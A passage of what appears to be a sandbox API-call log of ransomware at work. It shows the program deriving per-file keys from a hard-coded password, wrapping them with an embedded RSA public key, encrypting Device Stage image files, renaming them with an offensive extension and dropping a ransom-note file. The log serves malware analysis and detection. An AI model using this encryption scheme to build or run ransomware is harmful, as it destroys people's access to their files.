stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), bFailIfExists=0) returned 0 [0239.581] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", dwFileAttributes=0x0) returned 0 [0239.581] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.gsg")) returned 0 [0239.581] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.fuck")) returned 0 [0239.582] CryptDestroyHash (hHash=0x28bf118) returned 1 [0239.582] CryptDestroyKey (hKey=0x28bec18) returned 1 [0239.582] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.582] FindNextFileA (in: hFindFile=0x28beb58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.582] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.582] GetLastError () returned 0x5 [0239.582] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png")) returned 0x20 [0239.582] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", dwFileAttributes=0x80) returned 0 [0239.583] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.583] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.583] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.gsg", dwFileAttributes=0x2) returned 0 [0239.583] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28ab150) returned 1 [0239.585] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.585] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.585] CryptHashData (hHash=0x28bf1d8, pbData=0x2856f98, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.585] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x28bf1d8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28bf098) returned 1 [0239.585] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.585] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.585] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28ad9b0) returned 1 [0239.586] CryptImportPublicKeyInfo (in: hCryptProv=0x28ad9b0, dwCertEncodingType=0x1, pInfo=0x2898e40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2898e70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2898e78*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28bec58) returned 1 [0239.586] CryptEncrypt (in: hKey=0x28bec58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.586] CryptEncrypt (in: hKey=0x28bec58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ad5f8*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28ad5f8*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.586] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ad5f8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.586] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.586] CryptEncrypt (in: hKey=0x28bf098, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.586] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.586] CloseHandle (hObject=0xffffffff) returned 1 [0239.586] CloseHandle (hObject=0xffffffff) returned 1 [0239.586] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), bFailIfExists=0) returned 0 [0239.587] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", dwFileAttributes=0x0) returned 0 [0239.587] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.gsg")) returned 0 [0239.587] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png.fuck")) returned 0 [0239.588] CryptDestroyHash (hHash=0x28bf1d8) returned 1 [0239.588] CryptDestroyKey (hKey=0x28bf098) returned 1 [0239.588] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.588] FindNextFileA (in: hFindFile=0x28beb58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.588] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.588] GetLastError () returned 0x5 [0239.588] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png")) returned 0x20 [0239.588] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", dwFileAttributes=0x80) returned 0 [0239.590] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.590] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.590] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.gsg", dwFileAttributes=0x2) returned 0 [0239.591] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28ab150) returned 1 [0239.593] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.593] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.593] CryptHashData (hHash=0x28bec18, pbData=0x2856f70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.593] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x28bec18, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28bec98) returned 1 [0239.593] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.593] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.593] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28ad570) returned 1 [0239.594] CryptImportPublicKeyInfo (in: hCryptProv=0x28ad570, dwCertEncodingType=0x1, pInfo=0x2898f10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2898f40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2898f48*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28becd8) returned 1 [0239.594] CryptEncrypt (in: hKey=0x28becd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.594] CryptEncrypt (in: hKey=0x28becd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ada38*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28ada38*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.594] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ada38, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.594] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.595] CryptEncrypt (in: hKey=0x28bec98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.595] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.595] CloseHandle (hObject=0xffffffff) returned 1 [0239.595] CloseHandle (hObject=0xffffffff) returned 1 [0239.595] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), bFailIfExists=0) returned 0 [0239.595] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", dwFileAttributes=0x0) returned 0 [0239.596] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.gsg")) returned 0 [0239.596] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png.fuck")) returned 0 [0239.597] CryptDestroyHash (hHash=0x28bec18) returned 1 [0239.597] CryptDestroyKey (hKey=0x28bec98) returned 1 [0239.597] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.597] FindNextFileA (in: hFindFile=0x28beb58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0239.597] FindClose (in: hFindFile=0x28beb58 | out: hFindFile=0x28beb58) returned 1 [0239.597] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\readme_back_files.htm")) returned 0xffffffff [0239.597] AreFileApisANSI () returned 1 [0239.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2f58, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 111 [0239.597] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.598] GetLastError () returned 0x5 [0239.598] GetLastError () returned 0x5 [0239.598] FindNextFileA (in: hFindFile=0x28bea98, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.598] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28bec98 [0239.598] FindNextFileA (in: hFindFile=0x28bec98, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.598] FindNextFileA (in: hFindFile=0x28bec98, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.598] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.598] GetLastError () returned 0x5 [0239.599] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png")) returned 0x20 [0239.599] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", dwFileAttributes=0x80) returned 0 [0239.599] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.600] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.600] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.gsg", dwFileAttributes=0x2) returned 0 [0239.601] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28ab150) returned 1 [0239.603] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.603] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.603] CryptHashData (hHash=0x28bef98, pbData=0x28573d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.603] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x28bef98, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28bf118) returned 1 [0239.603] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.603] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.603] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28adf00) returned 1 [0239.604] CryptImportPublicKeyInfo (in: hCryptProv=0x28adf00, dwCertEncodingType=0x1, pInfo=0x2899590*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28995c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28995c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28bed18) returned 1 [0239.604] CryptEncrypt (in: hKey=0x28bed18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.604] CryptEncrypt (in: hKey=0x28bed18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28adac0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28adac0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.604] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28adac0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.604] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.604] CryptEncrypt (in: hKey=0x28bf118, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.605] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.605] CloseHandle (hObject=0xffffffff) returned 1 [0239.605] CloseHandle (hObject=0xffffffff) returned 1 [0239.605] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), bFailIfExists=0) returned 0 [0239.606] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", dwFileAttributes=0x0) returned 0 [0239.606] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.gsg")) returned 0 [0239.607] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png.fuck")) returned 0 [0239.607] CryptDestroyHash (hHash=0x28bef98) returned 1 [0239.607] CryptDestroyKey (hKey=0x28bf118) returned 1 [0239.607] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.607] FindNextFileA (in: hFindFile=0x28bec98, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.607] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.608] GetLastError () returned 0x5 [0239.608] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml")) returned 0x20 [0239.608] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml", dwFileAttributes=0x80) returned 0 [0239.608] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\behavior.xml" (normalized: "c:\\users\\all 